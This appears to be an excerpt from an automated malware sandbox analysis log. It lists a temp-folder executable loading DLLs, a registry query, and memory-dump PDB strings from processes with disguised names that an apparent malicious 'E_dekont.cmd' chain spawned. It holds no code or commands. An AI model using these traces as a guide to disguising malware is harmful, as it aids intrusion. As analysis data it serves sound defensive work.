Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ??.dll	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\x.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: E_dekont.cmd

Static file information: File size 1052051 > 1048576

Source:	Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: wdmvmswJ.pif, 0000000C.00000003.1554599936.0000000023230000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: wdmvmswJ.pif, 0000000C.00000003.1983421861.0000000024350000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: wdmvmswJ.pif, 0000000C.00000003.2098174285.0000000024350000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: wdmvmswJ.pif, 0000000C.00000003.2098174285.0000000024350000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msiexec.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1706447973.0000000024370000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jjs_objs\jjs.pdb source: alg.exe, 00000010.00000003.2977864019.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mavinject32.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.2383278080.0000000020960000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2379043668.0000000020950000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2926599466.00000000012C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PresentationFontCache.pdb source: wdmvmswJ.pif, 0000000C.00000003.1618765999.0000000024380000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2877167712.0000000001480000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PerceptionSimulationService.pdb source: wdmvmswJ.pif, 0000000C.00000003.1721671796.0000000024360000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: wdmvmswJ.pif, 0000000C.00000003.2072870006.0000000020950000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: MsSense.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1785492049.0000000025210000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: wdmvmswJ.pif, 0000000C.00000003.2359651772.000000001E730000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2923425427.00000000012C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: MsSense.pdb source: wdmvmswJ.pif, 0000000C.00000003.1785492049.0000000025210000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: wdmvmswJ.pif, 0000000C.00000003.2276020899.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2267524660.000000001E750000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2912565360.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\tnameserv_objs\tnameserv.pdb source: alg.exe, 00000010.00000003.2990957366.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\servertool_objs\servertool.pdb source: alg.exe, 00000010.00000003.2987868731.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ping.pdb source: esentutl.exe, 00000009.00000003.1537565062.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, xpha.pif, 00000012.00000000.1589664905.0000000000891000.00000020.00000001.01000000.0000000C.sdmp
Source:	Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1596957974.0000000023410000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmid_objs\rmid.pdb source: alg.exe, 00000010.00000003.2986208127.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: alg.exe, 00000010.00000003.2974357660.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: wdmvmswJ.pif, 0000000C.00000003.2007367357.0000000024340000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: x.exe, x.exe, 00000004.00000003.1478393290.000000007FB90000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1558259077.0000000002B1E000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1477425750.000000007FE00000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1582582313.000000002081D000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.1582582313.000000002084D000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp
Source:	Binary string: Acrobat_SL.pdb source: wdmvmswJ.pif, 0000000C.00000003.1992587018.0000000024350000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: cmd.pdbUGP source: esentutl.exe, 00000008.00000003.1530165716.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 0000000F.00000001.1581602644.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 0000000F.00000000.1581239901.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000011.00000001.1589367046.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000011.00000002.1700298021.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000020.00000002.1717123382.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000020.00000001.1716784161.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000021.00000001.1724048188.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000021.00000002.1724251285.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000023.00000002.1729021855.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, alpha.pif, 00000023.00000001.1728408630.0000000000011000.00000020.00000001.01000000.0000000B.sdmp
Source:	Binary string: ping.pdbGCTL source: esentutl.exe, 00000009.00000003.1537565062.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, 00000012.00000000.1589664905.0000000000891000.00000020.00000001.01000000.0000000C.sdmp
Source:	Binary string: easinvoker.pdbH source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\policytool_objs\policytool.pdb source: alg.exe, 00000010.00000003.2985347717.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: maintenanceservice.pdb source: wdmvmswJ.pif, 0000000C.00000003.1641792567.0000000024370000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: wdmvmswJ.pif, 0000000C.00000003.2359651772.000000001E730000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2923425427.00000000012C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PerfHost.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1753697067.00000000209F0000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.1728123927.0000000025210000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.1731106579.00000000209D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: wdmvmswJ.pif, 0000000C.00000003.2144195966.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmid_objs\rmid.pdb source: alg.exe, 00000010.00000003.2986208127.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: GoogleUpdate_unsigned.pdb source: alg.exe, 00000010.00000003.2967850181.00000000012C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PerfHost.pdb source: wdmvmswJ.pif, 0000000C.00000003.1753697067.00000000209F0000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.1728123927.0000000025210000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.1731106579.00000000209D0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: wdmvmswJ.pif, 0000000C.00000003.2166655404.000000001E710000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\keytool_objs\keytool.pdb source: alg.exe, 00000010.00000003.2980211327.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\tnameserv_objs\tnameserv.pdb source: alg.exe, 00000010.00000003.2990957366.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: alg.exe, 00000010.00000003.2974357660.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: wdmvmswJ.pif, 0000000C.00000003.2276020899.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2267524660.000000001E750000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2912565360.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: TieringEngineService.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1850517986.0000000024380000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: TieringEngineService.pdb source: wdmvmswJ.pif, 0000000C.00000003.1850517986.0000000024380000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ALG.pdb source: wdmvmswJ.pif, 0000000C.00000003.1580481767.0000000023220000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\orbd_objs\orbd.pdb source: alg.exe, 00000010.00000003.2983872074.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msdtcexe.pdb source: wdmvmswJ.pif, 0000000C.00000003.1651954044.00000000209E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: wdmvmswJ.pif, 0000000C.00000003.1596957974.0000000023410000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\orbd_objs\orbd.pdb source: alg.exe, 00000010.00000003.2983872074.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: snmptrap.pdb source: wdmvmswJ.pif, 0000000C.00000003.1809056276.0000000025210000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: wdmvmswJ.pif, 0000000C.00000003.2214506293.000000001E710000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: AppVShNotify.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.2353921741.000000001E6B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: wdmvmswJ.pif, 0000000C.00000003.2258316259.000000001E600000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msiexec.pdb source: wdmvmswJ.pif, 0000000C.00000003.1706447973.0000000024370000.00000004.00001000.00020000.00000000.sdmp
